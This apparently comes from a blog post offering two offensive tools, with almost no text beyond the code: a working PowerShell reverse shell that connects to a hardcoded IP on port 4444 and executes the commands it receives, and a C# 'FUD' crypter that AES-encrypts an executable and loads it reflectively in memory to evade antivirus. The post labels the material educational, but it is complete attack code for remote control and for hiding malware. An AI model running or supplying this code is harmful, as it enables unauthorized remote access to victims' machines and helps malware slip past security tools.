Authors:
Powershell script used for creating reverse TCP and bypasses AV
Write-Host "########################################################################";
Write-Host "# #";
Write-Host "# PowerShell AV EVASION #";
Write-Host "# #";
Write-Host "# #";
Write-Host "# 2020 #";
Write-Host "# For Education Purposes #";
Write-Host "# #";
Write-Host "########################################################################";
$client = $null;
$stream = $null;
$buffer = $null;
$writer = $null;
$data = $null;
$result = $null;
try {
$client = New-Object Net.Sockets.TcpClient("192.168.233.134", 4444);
$stream = $client.GetStream();
$buffer = New-Object Byte[] 1024;
$encoding = New-Object Text.AsciiEncoding;
$writer = New-Object IO.StreamWriter($stream);
$writer.AutoFlush = $true;
Write-Host "Bsides Munich...";
$bytes = 0;
do {
$writer.Write("PS>");
do {
$bytes = $stream.Read($buffer, 0, $buffer.Length);
if ($bytes -gt 0) {
$data = $data + $encoding.GetString($buffer, 0, $bytes);
}
} while ($stream.DataAvailable);
if ($data.Length -gt 0) {
try {
$result = Invoke-Expression -Command $data 2>&1 | Out-String;
} catch {
$result = $_.Exception.InnerException.Message;
}
$writer.WriteLine($result);
Clear-Variable -Name "data";
}
} while ($bytes -gt 0);
} catch {
Write-Host $_.Exception.InnerException.Message;
} finally {
if ($writer -ne $null) {
$writer.Close();
$writer.Dispose();
}
if ($stream -ne $null) {
$stream.Close();
$stream.Dispose();
}
if ($client -ne $null) {
$client.Close();
$client.Dispose();
}
if ($buffer -ne $null) {
$buffer.Clear();
}
if ($data -ne $null) {
Clear-Variable -Name "data";
}
if ($result -ne $null) {
Clear-Variable -Name "result";
}
}FUD .NET project using System.reflection
//Program.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
namespace Nice
{
class Program
{
static void Main(string[] args)
{
uitls.EnCmE(File.ReadAllBytes("myvr.exe"), "sr.txt");
byte[] cc = File.ReadAllBytes("sr.txt");
Thread.Sleep(19);
System.Reflection.Assembly.Load(uitls.DeCmE(cc)).EntryPoint.Invoke(null, null);
}
}
}
//uitls.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Security.Cryptography;
namespace Nice
{
class uitls
{
public static byte[] EnCmE(byte[] Bytes, string outputFile)
{
byte[] Th3Key = new byte[] { 0x4C, 0xDA, 0x9, 0x5D, 0x29, 0x3E, 0xB2, 0xDE, 0xB3, 0x81, 0x91, 0xF4, 0xC3, 0xFA, 0xA3, 0xD5 };
byte[] Th3Iv = new byte[] { 0xFA, 0x3D, 0xD7, 0xC2, 0xFC, 0x87, 0xD2, 0x85, 0xC9, 0x93, 0x63, 0xA6, 0x49, 0x9B, 0x1A, 0x28 };
RijndaelManaged myRj = new RijndaelManaged();
myRj.Mode = CipherMode.CBC;
myRj.Padding = PaddingMode.None;
ICryptoTransform theTransformer = myRj.CreateEncryptor(Th3Key, Th3Iv);
byte[] RArr = theTransformer.TransformFinalBlock(Bytes, 0, Bytes.Length);
myRj.Clear();
File.WriteAllBytes(outputFile, RArr);
return RArr;
}
public static byte[] DeCmE(byte[] Bytes)
{
byte[] key = new byte[] { 0x4C, 0xDA, 0x9, 0x5D, 0x29, 0x3E, 0xB2, 0xDE, 0xB3, 0x81, 0x91, 0xF4, 0xC3, 0xFA, 0xA3, 0xD5 };
byte[] iv = new byte[] { 0xFA, 0x3D, 0xD7, 0xC2, 0xFC, 0x87, 0xD2, 0x85, 0xC9, 0x93, 0x63, 0xA6, 0x49, 0x9B, 0x1A, 0x28 };
RijndaelManaged RjEnC = new RijndaelManaged();
RjEnC.Mode = CipherMode.CBC;
RjEnC.Padding = PaddingMode.None;
ICryptoTransform cTransform = RjEnC.CreateDecryptor(key, iv);
byte[] theArr = cTransform.TransformFinalBlock(Bytes, 0, Bytes.Length);
RjEnC.Clear();
return theArr;
}
}
}
Leave a Reply